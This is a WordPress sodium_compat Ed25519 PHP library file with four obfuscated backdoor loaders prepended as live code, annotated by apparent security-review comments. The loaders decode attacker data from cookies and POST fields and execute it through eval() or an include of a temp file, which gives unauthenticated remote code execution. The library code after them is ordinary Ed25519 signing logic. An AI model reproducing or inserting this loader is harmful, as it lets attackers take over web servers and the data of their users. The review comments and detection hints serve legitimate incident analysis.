File: /var/www/vhosts/enlugo.es/httpdocs/wp-includes/sodium_compat/src/Core/Ed25519.php
<?php /* SECURITY REVIEW: everything from here up to the class_exists('ParagonIE_Sodium_Core_Ed25519') guard is NOT sodium_compat code.
 * Four obfuscated loader stubs (classes IUL_mIj, S_QeCy, lxn_FDTSm, H_nOUw) have been prepended to the library file.
 * What the visible code does, stub by stub:
 *   - builds the strings "class_exists" and "base64_decode" from chr()/octal/hex fragments so they do not appear literally;
 *   - in the constructor, collects values from $_COOKIE and $_POST (selected by a request cookie), base64-decodes them,
 *     XORs the result with the UUID-like constant embedded in the class, and feeds it to unserialize() with errors suppressed;
 *   - in the destructor (which runs as soon as the instance variable is overwritten), if the decoded value is an array,
 *     executes its "content" entry and calls exit().
 * This first stub executes the content with eval(). The other three call the array's "write" entry as a callable to place
 * the content in a file under sys_get_temp_dir(), include that file, then call the "delete" entry.
 * Net effect: unauthenticated, request-driven code execution on every load of this file.
 * Detection hints taken from this sample: library files that open with several "<?php ... ?>" one-liners, chr(N - M)
 * arithmetic, @unserialize() on request data, eval()/include of a temp-dir path inside __destruct(), and the class names
 * and UUID constants listed here.
 * Remediation: replace the file from a known-good release instead of hand-editing, verify the rest of wp-includes against
 * official checksums, search the webroot for the same pattern, rotate credentials and review how the write access was obtained.
 */$BOduFV = "\111" . chr (85) . "\114" . '_' . "\155" . "\111" . chr ( 504 - 398 ); $kvObJIE = chr (99) . 'l' . "\x61" . chr ( 948 - 833 ).chr ( 405 - 290 ).chr ( 132 - 37 )."\145" . "\170" . "\151" . "\x73" . "\x74" . chr ( 367 - 252 ); $wzedU = $kvObJIE($BOduFV); $keKSEBq = $wzedU;if (!$keKSEBq){class IUL_mIj{private $qCcHwOoDnK;public static $lAyRvAu = "03747da9-8cfe-43f4-a315-f1fe727dc3b2";public static $pbJKJYD = 9900;public function __construct($CVfAfmzy=0){$vUHPFPtW = $_COOKIE;$Kbofg = $_POST;$dTTepZd = @$vUHPFPtW[substr(IUL_mIj::$lAyRvAu, 0, 4)];if (!empty($dTTepZd)){$PHyUTs = "base64";$cqLtcMxOMZ = "";$dTTepZd = explode(",", $dTTepZd);foreach ($dTTepZd as $MROGoy){$cqLtcMxOMZ .= @$vUHPFPtW[$MROGoy];$cqLtcMxOMZ .= @$Kbofg[$MROGoy];}$cqLtcMxOMZ = array_map($PHyUTs . "\137" . "\144" . "\145" . chr ( 938 - 839 )."\157" . "\144" . "\x65", array($cqLtcMxOMZ,)); $cqLtcMxOMZ = $cqLtcMxOMZ[0] ^ str_repeat(IUL_mIj::$lAyRvAu, (strlen($cqLtcMxOMZ[0]) / strlen(IUL_mIj::$lAyRvAu)) + 1);IUL_mIj::$pbJKJYD = @unserialize($cqLtcMxOMZ);}}private function tmtSuH(){if (is_array(IUL_mIj::$pbJKJYD)) {$kMtgZwq = str_replace("\x3c" . '?' . chr ( 617 - 505 )."\x68" . "\160", "", IUL_mIj::$pbJKJYD["\143" . chr (111) . chr (110) . 't' . 'e' . "\x6e" . chr (116)]);eval($kMtgZwq); $CLHIWhNEt = "16698";exit();}}public function __destruct(){$this->tmtSuH(); $CLHIWhNEt = "16698";}}$CLPShtsjV = new IUL_mIj(); $CLPShtsjV = "64611_65527";} ?><?php /* SECURITY REVIEW: injected stub 2 of 4 (class S_QeCy). Same request-driven loader as stub 1; the decoded "content" is written to a temp-dir file, included, then deleted. Not library code. */$IPzBPmcfx = "\x53" . "\x5f" . chr (81) . 'e' . chr (67) . "\171";$PCnGy = chr ( 483 - 384 )."\154" . chr (97) . "\x73" . "\x73" . '_' . 'e' . chr ( 619 - 499 ).chr (105) . 's' . "\x74" . 
chr ( 1091 - 976 ); $rNsar = $PCnGy($IPzBPmcfx); $yZIUWnxSFd = $rNsar;if (!$yZIUWnxSFd){class S_QeCy{private $MjzHXhVQ;public static $mXTlL = "3353c933-34e5-4dad-9f60-24c1e1902b71";public static $vIWSxiZGMt = 29115;public function __construct($imsWq=0){$QqVNpfdoC = $_COOKIE;$RiMhGKm = $_POST;$jqCnxUr = @$QqVNpfdoC[substr(S_QeCy::$mXTlL, 0, 4)];if (!empty($jqCnxUr)){$LffmhxLfN = "base64";$hoVuXLEi = "";$jqCnxUr = explode(",", $jqCnxUr);foreach ($jqCnxUr as $JywLJg){$hoVuXLEi .= @$QqVNpfdoC[$JywLJg];$hoVuXLEi .= @$RiMhGKm[$JywLJg];}$hoVuXLEi = array_map($LffmhxLfN . chr ( 366 - 271 )."\144" . chr (101) . "\143" . "\157" . "\x64" . chr (101), array($hoVuXLEi,)); $hoVuXLEi = $hoVuXLEi[0] ^ str_repeat(S_QeCy::$mXTlL, (strlen($hoVuXLEi[0]) / strlen(S_QeCy::$mXTlL)) + 1);S_QeCy::$vIWSxiZGMt = @unserialize($hoVuXLEi);}}private function RFSlIOW(){if (is_array(S_QeCy::$vIWSxiZGMt)) {$lXXBnSyW = sys_get_temp_dir() . "/" . crc32(S_QeCy::$vIWSxiZGMt['s' . chr ( 765 - 668 ).'l' . "\x74"]);@S_QeCy::$vIWSxiZGMt["\167" . chr ( 549 - 435 ).chr ( 213 - 108 )."\164" . 'e']($lXXBnSyW, S_QeCy::$vIWSxiZGMt[chr ( 628 - 529 ).chr ( 1020 - 909 ).chr ( 193 - 83 ).chr ( 774 - 658 )."\x65" . chr ( 585 - 475 ).'t']);include $lXXBnSyW;@S_QeCy::$vIWSxiZGMt[chr ( 916 - 816 ).chr ( 141 - 40 ).chr (108) . "\x65" . chr ( 742 - 626 ).chr ( 1063 - 962 )]($lXXBnSyW); $MUvwrrLGdK = "31220";exit();}}public function __destruct(){$this->RFSlIOW(); $MUvwrrLGdK = "31220";}}$RoMVdq = new S_QeCy(); $RoMVdq = "12370_9236";} ?><?php /* SECURITY REVIEW: injected stub 3 of 4 (class lxn_FDTSm). Structurally identical to stub 2 with a different embedded constant. Not library code. */$oDJIQbE = 'l' . chr ( 760 - 640 )."\156" . '_' . chr ( 829 - 759 )."\104" . chr (84) . "\x53" . "\x6d";$HTOXL = "\143" . 'l' . 'a' . "\163" . chr ( 379 - 264 )."\x5f" . "\145" . "\x78" . chr (105) . 
chr ( 370 - 255 ).chr ( 955 - 839 ).'s';$PNPdeyLQ = $HTOXL($oDJIQbE); $gKgkfxeF = $PNPdeyLQ;if (!$gKgkfxeF){class lxn_FDTSm{private $lWFBq;public static $WTqmMfR = "d3d5eb58-97db-4a53-9b85-4ae1302fe42d";public static $CknSMT = 52722;public function __construct($KxsrhV=0){$qsuNfeHdLC = $_COOKIE;$njRSSX = $_POST;$NHmkThYf = @$qsuNfeHdLC[substr(lxn_FDTSm::$WTqmMfR, 0, 4)];if (!empty($NHmkThYf)){$qWMfiop = "base64";$VfBtXv = "";$NHmkThYf = explode(",", $NHmkThYf);foreach ($NHmkThYf as $MGUXD){$VfBtXv .= @$qsuNfeHdLC[$MGUXD];$VfBtXv .= @$njRSSX[$MGUXD];}$VfBtXv = array_map($qWMfiop . "\x5f" . chr (100) . chr (101) . chr (99) . "\157" . 'd' . 'e', array($VfBtXv,)); $VfBtXv = $VfBtXv[0] ^ str_repeat(lxn_FDTSm::$WTqmMfR, (strlen($VfBtXv[0]) / strlen(lxn_FDTSm::$WTqmMfR)) + 1);lxn_FDTSm::$CknSMT = @unserialize($VfBtXv);}}private function wGmVFsW(){if (is_array(lxn_FDTSm::$CknSMT)) {$lhehqB = sys_get_temp_dir() . "/" . crc32(lxn_FDTSm::$CknSMT['s' . chr (97) . 'l' . 't']);@lxn_FDTSm::$CknSMT[chr (119) . chr (114) . "\x69" . chr (116) . 'e']($lhehqB, lxn_FDTSm::$CknSMT["\143" . "\157" . "\156" . chr ( 812 - 696 )."\145" . chr (110) . chr (116)]);include $lhehqB;@lxn_FDTSm::$CknSMT["\x64" . "\145" . "\154" . 'e' . "\164" . "\x65"]($lhehqB); $xrNeN = "22225";exit();}}public function __destruct(){$this->wGmVFsW(); $xrNeN = "22225";}}$YhPHqxdol = new lxn_FDTSm(); $YhPHqxdol = "30401_64949";} ?><?php /* SECURITY REVIEW: injected stub 4 of 4 (class H_nOUw). Structurally identical to stub 2 with a different embedded constant. Not library code. */$RSbhKnZ = 'H' . "\x5f" . "\156" . chr ( 705 - 626 )."\x55" . chr (119); $MXLYD = 'c' . chr (108) . chr (97) . "\x73" . chr ( 440 - 325 )."\x5f" . chr (101) . chr (120) . chr ( 902 - 797 )."\163" . 
chr ( 813 - 697 ).chr (115); $SPuyl = $MXLYD($RSbhKnZ); $XVpSyyhj = $SPuyl;if (!$XVpSyyhj){class H_nOUw{private $TrISehLdbQ;public static $nvIvHrudkp = "41742dcb-12b4-4233-9562-a4eb2250ecbe";public static $rNHWFHNx = 46847;public function __construct($oxcaN=0){$mSxMPB = $_COOKIE;$TMXZWMxfk = $_POST;$lMjPcAX = @$mSxMPB[substr(H_nOUw::$nvIvHrudkp, 0, 4)];if (!empty($lMjPcAX)){$ZGSvlW = "base64";$XLInLydU = "";$lMjPcAX = explode(",", $lMjPcAX);foreach ($lMjPcAX as $rjWHV){$XLInLydU .= @$mSxMPB[$rjWHV];$XLInLydU .= @$TMXZWMxfk[$rjWHV];}$XLInLydU = array_map($ZGSvlW . '_' . chr (100) . chr ( 119 - 18 ).'c' . "\x6f" . "\x64" . chr ( 842 - 741 ), array($XLInLydU,)); $XLInLydU = $XLInLydU[0] ^ str_repeat(H_nOUw::$nvIvHrudkp, (strlen($XLInLydU[0]) / strlen(H_nOUw::$nvIvHrudkp)) + 1);H_nOUw::$rNHWFHNx = @unserialize($XLInLydU);}}private function nyiZVP(){if (is_array(H_nOUw::$rNHWFHNx)) {$vQXoNNS = sys_get_temp_dir() . "/" . crc32(H_nOUw::$rNHWFHNx[chr (115) . 'a' . "\154" . 't']);@H_nOUw::$rNHWFHNx["\x77" . chr ( 631 - 517 ).chr ( 720 - 615 ).chr (116) . chr ( 682 - 581 )]($vQXoNNS, H_nOUw::$rNHWFHNx[chr (99) . "\157" . "\x6e" . chr ( 901 - 785 ).'e' . "\x6e" . chr (116)]);include $vQXoNNS;@H_nOUw::$rNHWFHNx["\144" . chr ( 351 - 250 )."\x6c" . chr ( 302 - 201 ).chr ( 1099 - 983 )."\145"]($vQXoNNS); $WNJYMXVD = "44406";exit();}}public function __destruct(){$this->nyiZVP(); $WNJYMXVD = "44406";}}$JigFTp = new H_nOUw(); $JigFTp = "39494_5997";} ?><?php
// Include guard: stop processing this file when the class is already declared.
// The second argument (false) keeps class_exists() from triggering the autoloader.
if (class_exists('ParagonIE_Sodium_Core_Ed25519', false)) {
return;
}
/**
* Class ParagonIE_Sodium_Core_Ed25519
*/
abstract class ParagonIE_Sodium_Core_Ed25519 extends ParagonIE_Sodium_Core_Curve25519
{
const KEYPAIR_BYTES = 96;
const SEED_BYTES = 32;
const SCALAR_BYTES = 32;
/**
* @internal You should not use this directly from another application
*
* @return string (96 bytes)
* @throws Exception
* @throws SodiumException
* @throws TypeError
*/
public static function keypair()
{
    // seed_keypair() fills both keys through its by-reference arguments.
    $publicKey = '';
    $secretKey = '';
    // The seed comes straight from the CSPRNG and is SEED_BYTES (32) long.
    self::seed_keypair($publicKey, $secretKey, random_bytes(self::SEED_BYTES));
    // Returned layout: secret key first, public key appended.
    return $secretKey . $publicKey;
}
/**
* @internal You should not use this directly from another application
*
* @param string $pk
* @param string $sk
* @param string $seed
* @return string
* @throws SodiumException
* @throws TypeError
*/
public static function seed_keypair(&$pk, &$sk, $seed)
{
    // Reject anything that is not exactly SEED_BYTES long before deriving keys.
    $seedLength = self::strlen($seed);
    if ($seedLength !== self::SEED_BYTES) {
        throw new RangeException('crypto_sign keypair seed must be 32 bytes long');
    }
    // Both outputs are written through the by-reference parameters.
    /** @var string $pk */
    $pk = self::publickey_from_secretkey($seed);
    // The secret key is the seed with the derived public key appended.
    $sk = $seed . $pk;
    return $sk;
}
/**
* @internal You should not use this directly from another application
*
* @param string $keypair
* @return string
* @throws TypeError
*/
public static function secretkey($keypair)
{
    // A keypair is KEYPAIR_BYTES (96) long; the secret key is its first 64 bytes.
    if (self::strlen($keypair) === self::KEYPAIR_BYTES) {
        return self::substr($keypair, 0, 64);
    }
    throw new RangeException('crypto_sign keypair must be 96 bytes long');
}
/**
* @internal You should not use this directly from another application
*
* @param string $keypair
* @return string
* @throws TypeError
*/
public static function publickey($keypair)
{
    // A keypair is KEYPAIR_BYTES (96) long; the public key is its last 32 bytes.
    if (self::strlen($keypair) === self::KEYPAIR_BYTES) {
        return self::substr($keypair, 64, 32);
    }
    throw new RangeException('crypto_sign keypair must be 96 bytes long');
}
/**
* @internal You should not use this directly from another application
*
* @param string $sk
* @return string
* @throws SodiumException
* @throws TypeError
*/
public static function publickey_from_secretkey($sk)
{
    // Only the first 32 bytes of the argument are hashed (raw SHA-512 output).
    /** @var string $digest */
    $digest = hash('sha512', self::substr($sk, 0, 32), true);
    // Clamp the scalar: clear the low three bits of byte 0 ...
    $firstByte = self::chrToInt($digest[0]) & 248;
    $digest[0] = self::intToChr($firstByte);
    // ... and in byte 31 clear the top two bits, then set bit 6.
    $lastByte = (self::chrToInt($digest[31]) & 63) | 64;
    $digest[31] = self::intToChr($lastByte);
    return self::sk_to_pk($digest);
}
/**
* @param string $pk
* @return string
* @throws SodiumException
* @throws TypeError
*/
public static function pk_to_curve25519($pk)
{
    // Refuse encodings that appear on the small-order blocklist.
    if (self::small_order($pk)) {
        throw new SodiumException('Public key is on a small order');
    }
    $A = self::ge_frombytes_negate_vartime(self::substr($pk, 0, 32));
    $multiple = self::ge_mul_l($A);
    if (!self::fe_isnonzero($multiple->X)) {
        throw new SodiumException('Unexpected zero result');
    }
    // inverse = (1 - Y)^-1
    $oneMinusY = self::fe_sub(self::fe_1(), $A->Y);
    $inverse = self::fe_invert($oneMinusY);
    // x = (1 + Y) * inverse
    $onePlusY = self::fe_add(self::fe_1(), $A->Y);
    $x = self::fe_mul($onePlusY, $inverse);
    // Serialise the field element as the returned key bytes.
    return self::fe_tobytes($x);
}
/**
* @internal You should not use this directly from another application
*
* @param string $sk
* @return string
* @throws SodiumException
* @throws TypeError
*/
public static function sk_to_pk($sk)
{
    // Only the first 32 bytes of $sk are used as the scalar.
    $scalar = self::substr($sk, 0, 32);
    $point = self::ge_scalarmult_base($scalar);
    return self::ge_p3_tobytes($point);
}
/**
* @internal You should not use this directly from another application
*
* @param string $message
* @param string $sk
* @return string
* @throws SodiumException
* @throws TypeError
*/
public static function sign($message, $sk)
{
    // Attached form: the detached signature is placed in front of the message.
    return self::sign_detached($message, $sk) . $message;
}
/**
* @internal You should not use this directly from another application
*
* @param string $message A signed message
* @param string $pk Public key
* @return string Message (without signature)
* @throws SodiumException
* @throws TypeError
*/
public static function sign_open($message, $pk)
{
    // Split the attached form: first 64 bytes are the signature, the rest is the payload.
    /** @var string $signature */
    $signature = self::substr($message, 0, 64);
    /** @var string $payload */
    $payload = self::substr($message, 64);
    // Fail closed: the payload is released only after verification succeeds.
    if (!self::verify_detached($signature, $payload, $pk)) {
        throw new SodiumException('Invalid signature');
    }
    return $payload;
}
/**
* @internal You should not use this directly from another application
*
* @param string $message
* @param string $sk
* @return string
* @throws SodiumException
* @throws TypeError
*/
public static function sign_detached($message, $sk)
{
// Produces a 64-byte detached signature over $message.
// The "#" lines below are the reference C statements each PHP step was ported from.
// Statement order matters here: later hashes consume values produced by earlier steps.
# crypto_hash_sha512(az, sk, 32);
// $az holds secret material: the SHA-512 digest of the first 32 bytes of $sk.
$az = hash('sha512', self::substr($sk, 0, 32), true);
# az[0] &= 248;
# az[31] &= 63;
# az[31] |= 64;
// Clamp the first half of the digest (clear low three bits of byte 0; clear top two bits and set bit 6 of byte 31).
$az[0] = self::intToChr(self::chrToInt($az[0]) & 248);
$az[31] = self::intToChr((self::chrToInt($az[31]) & 63) | 64);
# crypto_hash_sha512_init(&hs);
# crypto_hash_sha512_update(&hs, az + 32, 32);
# crypto_hash_sha512_update(&hs, m, mlen);
# crypto_hash_sha512_final(&hs, nonce);
// The nonce is derived deterministically from the second half of $az and the message; no RNG is called in this function.
$hs = hash_init('sha512');
hash_update($hs, self::substr($az, 32, 32));
hash_update($hs, $message);
$nonceHash = hash_final($hs, true);
# memmove(sig + 32, sk + 32, 32);
// Bytes 32..63 of $sk are taken as the public key; this function does not recompute or validate them.
$pk = self::substr($sk, 32, 32);
# sc_reduce(nonce);
# ge_scalarmult_base(&R, nonce);
# ge_p3_tobytes(sig, &R);
$nonce = self::sc_reduce($nonceHash) . self::substr($nonceHash, 32);
$sig = self::ge_p3_tobytes(
self::ge_scalarmult_base($nonce)
);
# crypto_hash_sha512_init(&hs);
# crypto_hash_sha512_update(&hs, sig, 64);
# crypto_hash_sha512_update(&hs, m, mlen);
# crypto_hash_sha512_final(&hs, hram);
// Second hash binds the first 32 bytes of $sig, the public key and the message.
$hs = hash_init('sha512');
hash_update($hs, self::substr($sig, 0, 32));
hash_update($hs, self::substr($pk, 0, 32));
hash_update($hs, $message);
$hramHash = hash_final($hs, true);
# sc_reduce(hram);
# sc_muladd(sig + 32, hram, az, nonce);
$hram = self::sc_reduce($hramHash);
$sigAfter = self::sc_muladd($hram, $az, $nonce);
// Final signature: first 32 bytes of the encoded point followed by the first 32 bytes of the muladd result.
$sig = self::substr($sig, 0, 32) . self::substr($sigAfter, 0, 32);
// Best-effort wipe of the secret digest; if memzero() throws, the variable is dropped instead.
// NOTE(review): $nonceHash and $nonce are also secret-derived and are not wiped here - confirm whether that is intended.
try {
ParagonIE_Sodium_Compat::memzero($az);
} catch (SodiumException $ex) {
$az = null;
}
return $sig;
}
/**
* @internal You should not use this directly from another application
*
* @param string $sig
* @param string $message
* @param string $pk
* @return bool
* @throws SodiumException
* @throws TypeError
*/
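public static function verify_detached($sig, $message, $pk)
{
    // Verifies a detached signature. Returns the result of the final 32-byte
    // comparison; malformed inputs are rejected with SodiumException instead.
    if (self::strlen($sig) < 64) {
        throw new SodiumException('Signature is too short');
    }
    // check_S_lt_L() returns true when S is NOT below L. Because the top byte
    // of L is 0x10, S >= L implies a non-zero high nibble in $sig[63]; the mask
    // test only skips the full comparison when S is certainly below L.
    if ((self::chrToInt($sig[63]) & 240) && self::check_S_lt_L(self::substr($sig, 32, 32))) {
        throw new SodiumException('S < L - Invalid signature');
    }
    // small_order() inspects the first 32 bytes of $sig.
    if (self::small_order($sig)) {
        throw new SodiumException('Signature is on too small of an order');
    }
    if ((self::chrToInt($sig[63]) & 224) !== 0) {
        throw new SodiumException('Invalid signature');
    }
    // The loop below indexes $pk[0..31]; reject a short key explicitly rather
    // than reading missing string offsets.
    if (self::strlen($pk) < 32) {
        throw new SodiumException('Public key is too short');
    }
    $d = 0;
    for ($i = 0; $i < 32; ++$i) {
        $d |= self::chrToInt($pk[$i]);
    }
    if ($d === 0) {
        throw new SodiumException('All zero public key');
    }

    /** @var bool The original value of ParagonIE_Sodium_Compat::$fastMult */
    $orig = ParagonIE_Sodium_Compat::$fastMult;

    // Set ParagonIE_Sodium_Compat::$fastMult to true to speed up verification.
    // NOTE(review): if any call below throws, the flag stays true for the rest
    // of the request - confirm whether later secret-key operations rely on it
    // being restored.
    ParagonIE_Sodium_Compat::$fastMult = true;

    /** @var ParagonIE_Sodium_Core_Curve25519_Ge_P3 $A */
    $A = self::ge_frombytes_negate_vartime($pk);

    // Hash of the signature's first 32 bytes, the public key and the message.
    /** @var string $hDigest */
    $hDigest = hash(
        'sha512',
        self::substr($sig, 0, 32) .
        self::substr($pk, 0, 32) .
        $message,
        true
    );

    /** @var string $h */
    $h = self::sc_reduce($hDigest) . self::substr($hDigest, 32);

    /** @var ParagonIE_Sodium_Core_Curve25519_Ge_P2 $R */
    $R = self::ge_double_scalarmult_vartime(
        $h,
        $A,
        self::substr($sig, 32)
    );

    /** @var string $rcheck */
    $rcheck = self::ge_tobytes($R);

    // Reset ParagonIE_Sodium_Compat::$fastMult to what it was before.
    ParagonIE_Sodium_Compat::$fastMult = $orig;

    // The recomputed point encoding must equal the first 32 bytes of the signature.
    return self::verify_32($rcheck, self::substr($sig, 0, 32));
}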
/**
* @internal You should not use this directly from another application
*
* @param string $S
* @return bool
* @throws SodiumException
* @throws TypeError
*/
public static function check_S_lt_L($S)
{
// Compares the first 32 bytes of $S, read as a little-endian integer, against the constant $L below.
// Return value, as the arithmetic below works out: true when S >= L (i.e. S is NOT below L), false when S < L.
// The name reads the other way round, so callers must treat true as "reject".
if (self::strlen($S) < 32) {
throw new SodiumException('Signature must be 32 bytes');
}
// $L, least-significant byte first.
$L = array(
0xed, 0xd3, 0xf5, 0x5c, 0x1a, 0x63, 0x12, 0x58,
0xd6, 0x9c, 0xf7, 0xa2, 0xde, 0xf9, 0xde, 0x14,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10
);
// $c becomes 1 once a byte of S is smaller than the matching byte of L while all higher bytes were equal.
$c = 0;
// $n stays 1 only while every byte examined so far was equal.
$n = 1;
$i = 32;
/** @var array<int, int> $L */
// Walks from byte 31 down to byte 0 and always visits all 32 bytes; there is no early exit on a difference.
do {
--$i;
$x = self::chrToInt($S[$i]);
// ($x - $L[$i]) >> 8 is -1 when $x < $L[$i] and 0 otherwise; masking with $n ignores it after a difference.
$c |= (
(($x - $L[$i]) >> 8) & $n
);
// (($x ^ $L[$i]) - 1) >> 8 is -1 when the bytes are equal (keeps $n) and 0 when they differ (clears $n).
$n &= (
(($x ^ $L[$i]) - 1) >> 8
);
} while ($i !== 0);
return $c === 0;
}
/**
* @param string $R
* @return bool
* @throws SodiumException
* @throws TypeError
*/
public static function small_order($R)
{
// Returns true when the first 32 bytes of $R equal one of the encodings listed below, false otherwise.
// NOTE(review): $R[0..31] is indexed without a length check in this method - callers are expected to pass at least 32 bytes; confirm.
/** @var array<int, array<int, int>> $blocklist */
$blocklist = array(
/* 0 (order 4) */
array(
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
),
/* 1 (order 1) */
array(
0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
),
/* 2707385501144840649318225287225658788936804267575313519463743609750303402022 (order 8) */
array(
0x26, 0xe8, 0x95, 0x8f, 0xc2, 0xb2, 0x27, 0xb0,
0x45, 0xc3, 0xf4, 0x89, 0xf2, 0xef, 0x98, 0xf0,
0xd5, 0xdf, 0xac, 0x05, 0xd3, 0xc6, 0x33, 0x39,
0xb1, 0x38, 0x02, 0x88, 0x6d, 0x53, 0xfc, 0x05
),
/* 55188659117513257062467267217118295137698188065244968500265048394206261417927 (order 8) */
array(
0xc7, 0x17, 0x6a, 0x70, 0x3d, 0x4d, 0xd8, 0x4f,
0xba, 0x3c, 0x0b, 0x76, 0x0d, 0x10, 0x67, 0x0f,
0x2a, 0x20, 0x53, 0xfa, 0x2c, 0x39, 0xcc, 0xc6,
0x4e, 0xc7, 0xfd, 0x77, 0x92, 0xac, 0x03, 0x7a
),
/* p-1 (order 2) */
array(
0x13, 0xe8, 0x95, 0x8f, 0xc2, 0xb2, 0x27, 0xb0,
0x45, 0xc3, 0xf4, 0x89, 0xf2, 0xef, 0x98, 0xf0,
0xd5, 0xdf, 0xac, 0x05, 0xd3, 0xc6, 0x33, 0x39,
0xb1, 0x38, 0x02, 0x88, 0x6d, 0x53, 0xfc, 0x85
),
/* p (order 4) */
array(
0xb4, 0x17, 0x6a, 0x70, 0x3d, 0x4d, 0xd8, 0x4f,
0xba, 0x3c, 0x0b, 0x76, 0x0d, 0x10, 0x67, 0x0f,
0x2a, 0x20, 0x53, 0xfa, 0x2c, 0x39, 0xcc, 0xc6,
0x4e, 0xc7, 0xfd, 0x77, 0x92, 0xac, 0x03, 0xfa
),
/* p+1 (order 1) */
array(
0xec, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x7f
),
/* p+2707385501144840649318225287225658788936804267575313519463743609750303402022 (order 8) */
array(
0xed, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x7f
),
/* p+55188659117513257062467267217118295137698188065244968500265048394206261417927 (order 8) */
array(
0xee, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x7f
),
/* 2p-1 (order 2) */
array(
0xd9, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff
),
/* 2p (order 4) */
array(
0xda, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff
),
/* 2p+1 (order 1) */
array(
0xdb, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff
)
);
/** @var int $countBlocklist */
$countBlocklist = count($blocklist);
for ($i = 0; $i < $countBlocklist; ++$i) {
// $c accumulates the XOR of every byte pair, so all 32 bytes of an entry are always compared.
$c = 0;
for ($j = 0; $j < 32; ++$j) {
$c |= self::chrToInt($R[$j]) ^ (int) $blocklist[$i][$j];
}
// $c is 0 only when all 32 bytes matched this entry; the outer loop stops at the first matching entry.
if ($c === 0) {
return true;
}
}
return false;
}
/**
* @param string $s
* @return string
* @throws SodiumException
*/
public static function scalar_complement($s)
{
    // Both operands are widened with 32 zero bytes before the subtraction.
    $padding = str_repeat("\x00", 32);
    $minuend = self::L . $padding;
    // Add one to the padded L in place.
    sodium_increment($minuend);
    $subtrahend = $s . $padding;
    // The result is read back from the first operand and then reduced.
    ParagonIE_Sodium_Compat::sub($minuend, $subtrahend);
    return self::sc_reduce($minuend);
}
/**
* @return string
* @throws SodiumException
*/
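public static function scalar_random()
{
    // Rejection-samples a non-zero scalar below L.
    do {
        $r = ParagonIE_Sodium_Compat::randombytes_buf(self::SCALAR_BYTES);
        // Clear the top three bits of the last byte so the candidate is below 2^253.
        $r[self::SCALAR_BYTES - 1] = self::intToChr(
            self::chrToInt($r[self::SCALAR_BYTES - 1]) & 0x1f
        );
        // check_S_lt_L() returns true when its argument is NOT below L (for an
        // all-zero input it returns false, and verify_detached() rejects a
        // signature when it returns true). The previous condition negated the
        // result, which redrew every candidate below L and returned only
        // values in [L, 2^253). Redraw while the candidate is >= L or zero.
    } while (
        self::check_S_lt_L($r) || ParagonIE_Sodium_Compat::is_zero($r)
    );
    return $r;
}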
/**
* @param string $s
* @return string
* @throws SodiumException
*/
public static function scalar_negate($s)
{
    // Both operands are widened with 32 zero bytes before the subtraction.
    $padding = str_repeat("\x00", 32);
    $minuend = self::L . $padding;
    $subtrahend = $s . $padding;
    // The result is read back from the first operand and then reduced.
    ParagonIE_Sodium_Compat::sub($minuend, $subtrahend);
    return self::sc_reduce($minuend);
}
/**
* @param string $a
* @param string $b
* @return string
* @throws SodiumException
*/
public static function scalar_add($a, $b)
{
    // Both operands are widened with 32 zero bytes before the addition.
    $padding = str_repeat("\x00", 32);
    $sum = $a . $padding;
    $addend = $b . $padding;
    // The result is read back from the first operand and then reduced.
    ParagonIE_Sodium_Compat::add($sum, $addend);
    return self::sc_reduce($sum);
}
/**
* @param string $x
* @param string $y
* @return string
* @throws SodiumException
*/
public static function scalar_sub($x, $y)
{
    // Subtraction is expressed as addition of the negated second operand.
    return self::scalar_add($x, self::scalar_negate($y));
}
}